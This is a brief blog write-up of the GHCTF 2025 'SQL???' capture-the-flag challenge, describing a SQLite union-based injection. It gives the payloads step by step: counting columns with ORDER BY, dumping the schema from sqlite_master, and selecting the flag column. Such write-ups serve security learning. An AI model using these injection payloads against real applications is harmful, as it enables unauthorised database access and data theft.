[GHCTF 2025]SQL???

打开题目在线环境:

先尝试注入:

id=1;show databases;

发现报错,后来看了wp才知道这个题目是SQLite注入。

我看的是这个师傅的wp:

https://blog.csdn.net/2401_86190146/article/details/146164505?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522b2e94c28c4b9713fffb8456c983de1b3%2522%252C%2522scm%2522%253A%252220140713.130102334...%2522%257D\&request_id=b2e94c28c4b9713fffb8456c983de1b3\&biz_id=0\&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend\~default-1-146164505-null-null.142^v102^pc_search_result_base9\&utm_term=[GHCTF 2025]SQL\&spm=1018.2226.3001.4187

1.先判断有几列

python 复制代码
? id=1 order by 6 #

到第六列时:

2.爆出来表名

python 复制代码
/?id=1 union select 1,2,3,4,group_concat(sql) from sqlite_master

所以我们要找的就是flag表里的flag列

直接payload:

python 复制代码
/?id=1 union select 1,2,3,4,flag from flag

在这里插入图片描述

相关推荐
不枯石11 分钟前
Matlab通过GUI实现点云的均值滤波(附最简版)
开发语言·图像处理·算法·计算机视觉·matlab·均值算法
不枯石19 分钟前
Matlab通过GUI实现点云的双边(Bilateral)滤波(附最简版)
开发语言·图像处理·算法·计算机视觉·matlab
ccccczy_33 分钟前
Spring Security 深度解读:JWT 无状态认证与权限控制实现细节
java·spring security·jwt·authentication·authorization·securityfilterchain·onceperrequestfilter
Lin_Aries_042135 分钟前
容器化 Tomcat 应用程序
java·linux·运维·docker·容器·tomcat
sheji341637 分钟前
【开题答辩全过程】以 springboot高校社团管理系统的设计与实现为例,包含答辩的问题和答案
java·spring boot·后端
二十雨辰1 小时前
vite如何处理项目中的资源
开发语言·javascript
zzywxc7871 小时前
大模型落地实践指南:从技术路径到企业级解决方案
java·人工智能·python·microsoft·golang·prompt
相与还1 小时前
IDEA+SpringBoot实现远程DEBUG到本机
java·spring boot·intellij-idea
聆风吟º1 小时前
远程录制新体验:Bililive-go与cpolar的无缝协作
开发语言·后端·golang
小杨勇敢飞1 小时前
IDEA 2024 中创建 Maven 项目的详细步骤
java·ide·intellij-idea